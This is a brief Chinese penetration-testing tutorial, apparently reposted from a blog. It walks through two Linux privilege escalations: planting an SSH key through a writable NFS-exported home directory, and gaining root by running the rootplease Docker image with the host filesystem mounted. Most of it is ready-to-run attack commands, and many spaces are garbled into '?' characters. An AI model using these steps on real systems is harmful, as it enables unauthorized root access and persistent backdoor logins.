nfs 挂载提权 + docker 用户组提权

2023-12-18 23:20:36

nfs 挂载提权

目标机器192.168.206.143?需开启2049?nfs端口

在攻击机kali安装nfs:

sudo?apt-get?install?nfs-common

查看目标开放的文件夹

showmount?-e?192.168.206.143

回显:/home/peter?*??说明可挂载/home/peter的所有目录

创建用户(root权限下)

  1. 在本机创建一个peter用户并且uid为1001 gid为1005即可

  2. 创建组并指定组GID:

  3. groupadd -g 1005 peter

  4. 创建用户并指定uid以及gid:

  5. adduser peter -uid 1001 -gid 1005

?

生成公钥和私钥

ssh-keygen

将公钥复制到创建的挂载目录下

cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys?

赋值权限

chmod 700 .ssh

chmod?600?authorized_keys

?

用ssh 连接

ssh peter@192.168.206.143

docker 提权

Docker?运行的所有命令都是需要?sudo?来运行,那是因为?docker?需要?root?权限才能跑。

Docker?监护进程有一个特性,它能被允许访问?root?用户或者是在?docker?组里面的所有用户,这就如同拥有?root?的访问权限。

如果一个服务器有一个普通的用户,并且这个用户加入了?docker?组,则这个用户已经是?root?了,默认情况下,Docker?软件包是会默认添加一个?docker?用户组

命令:?id??查看当前用户组信息

查看用户组? cat /etc/group

提权(需要能够从外网拉镜像):

docker?run?-v?/:/hostOS?-i?-t?chrisfosterelli/rootplease

文章来源:https://blog.csdn.net/m0_55628907/article/details/132759676
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。